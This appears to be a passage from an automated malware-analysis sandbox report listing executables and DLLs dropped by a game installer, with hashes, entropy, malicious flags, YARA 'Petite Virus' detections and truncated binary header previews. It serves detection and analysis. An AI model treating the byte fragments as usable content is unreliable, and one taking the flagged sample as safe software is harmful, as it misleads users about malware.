Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.\|w.t...\..dkB%..i.cX...`B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....\|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..

C:\Program Files (x86)\CRTGame\bin\x86\is-LPFO4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	906766
Entropy (8bit):	6.450201653594769
Encrypted:	false
SSDEEP:	24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
MD5:	AF785965AB0BF2474B3DD6E53DA2F368
SHA1:	EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
SHA-256:	8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
SHA-512:	5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................\|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..\|;.......<..................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-M9T5O.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	337408
Entropy (8bit):	6.515131904432587
Encrypted:	false
SSDEEP:	6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
MD5:	62D2156E3CA8387964F7AA13DD1CCD5B
SHA1:	A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
SHA-256:	59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
SHA-512:	006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..\|...\|...\|...p...\|...w...\|.d.r...\|...v...\|...x...\|.i.#...\|...}.\|.\|.d.!...\|...w...\|..V....\|...v...\|.......\|. .z...\|.Rich..\|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-MOAUB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	6.232860260916194
Encrypted:	false
SSDEEP:	768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
MD5:	B162992412E08888456AE13BA8BD3D90
SHA1:	095FA02EB14FD4BD6EA06F112FDAFE97522F9888
SHA-256:	2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
SHA-512:	078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram\|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-NGO5I.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.423554884287906
Encrypted:	false
SSDEEP:	6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
MD5:	67247C0ACA089BDE943F802BFBA8752C
SHA1:	508DA6E0CF31A245D27772C70FFA9A2AE54930A3
SHA-256:	BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
SHA-512:	C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-NLS7L.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	5.173769974589746
Encrypted:	false
SSDEEP:	192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
MD5:	9C55B3E5ED1365E82AE9D5DA3EAEC9F2
SHA1:	BB3D30805A84C6F0803BE549C070F21C735E10A9
SHA-256:	D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
SHA-512:	EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-P220F.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	648384
Entropy (8bit):	6.666474522542094
Encrypted:	false
SSDEEP:	12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:	CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:	56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:	A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:	03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-PTERI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	6.676457645865373
Encrypted:	false
SSDEEP:	3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:	2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:	6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:	D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:	C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-PV0J3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68042
Entropy (8bit):	6.090396152400884
Encrypted:	false
SSDEEP:	768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
MD5:	5DDA5D34AC6AA5691031FD4241538C82
SHA1:	22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
SHA-256:	DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
SHA-512:	08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-RPVR0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11532
Entropy (8bit):	7.219753259626605
Encrypted:	false
SSDEEP:	192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
MD5:	073F34B193F0831B3DD86313D74F1D2A
SHA1:	3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
SHA-256:	C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
SHA-512:	EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-RPVR0.tmp, Author: Joe Security
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite.............................`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\...S...s..$..........o..y..........,.........-..X.....v.M1..'...5R.4..8k!..q.=BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z..).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re

C:\Program Files (x86)\CRTGame\bin\x86\is-T5S6S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258560
Entropy (8bit):	6.491223412910377
Encrypted:	false
SSDEEP:	6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:	DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:	8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:	38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:	A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-TO8AC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	266254
Entropy (8bit):	6.343813822604148
Encrypted:	false
SSDEEP:	3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
MD5:	8B099FA7B51A8462683BD6FF5224A2DC
SHA1:	C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
SHA-256:	438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
SHA-512:	9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-UJSO3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	394752
Entropy (8bit):	6.662070316214798
Encrypted:	false
SSDEEP:	6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
MD5:	A4123DE65270C91849FFEB8515A864C4
SHA1:	93971C6BB25F3F4D54D4DF6C0C002199A2F84525
SHA-256:	43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
SHA-512:	D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-UNJDD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	240654
Entropy (8bit):	6.518503846592995
Encrypted:	false
SSDEEP:	6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:	4F0C85351AEC4B00300451424DB4B5A4
SHA1:	BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:	CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:	80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-V5C1L.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68876
Entropy (8bit):	7.922125376804506
Encrypted:	false
SSDEEP:	1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
MD5:	4E35BA785CD3B37A3702E577510F39E3
SHA1:	A2FD74A68BEFF732E5F3CB0835713AEA8D639902
SHA-256:	0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
SHA-512:	1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-V5C1L.tmp, Author: Joe Security
Preview:	MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c..=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..

C:\Program Files (x86)\CRTGame\bin\x86\is-VFRK7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	562190
Entropy (8bit):	6.388293171196564
Encrypted:	false
SSDEEP:	12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
MD5:	713D04E7396D3A4EFF6BF8BA8B9CB2CD
SHA1:	D824F373C219B33988CFA3D4A53E7C2BFA096870
SHA-256:	00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
SHA-512:	30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-VG2L5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	62478
Entropy (8bit):	6.063363187934607
Encrypted:	false
SSDEEP:	768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
MD5:	940EEBDB301CB64C7EA2E7FA0646DAA3
SHA1:	0347F029DA33C30BBF3FB067A634B49E8C89FEC2
SHA-256:	B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
SHA-512:	50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..\|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..\|....P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-VKOGP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18966
Entropy (8bit):	7.620111275837424
Encrypted:	false
SSDEEP:	384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
MD5:	F0F973781B6A66ADF354B04A36C5E944
SHA1:	8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
SHA-256:	04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
SHA-512:	118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-VKOGP.tmp, Author: Joe Security
Preview:	MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967168
Entropy (8bit):	6.500850562754145
Encrypted:	false
SSDEEP:	12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
MD5:	C06D6F4DABD9E8BBDECFC5D61B43A8A9
SHA1:	16D9F4F035835AFE8F694AE5529F95E4C3C78526
SHA-256:	665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
SHA-512:	B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\lessmsi\is-MAFGK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	506871
Entropy (8bit):	7.998074018431883
Encrypted:	true
SSDEEP:	12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
MD5:	D52F8AE89AC65F755C28A95C274C1FFE
SHA1:	50D581469FF0648EE628A027396F39598995D8B0
SHA-256:	2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
SHA-512:	B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
Malicious:	false
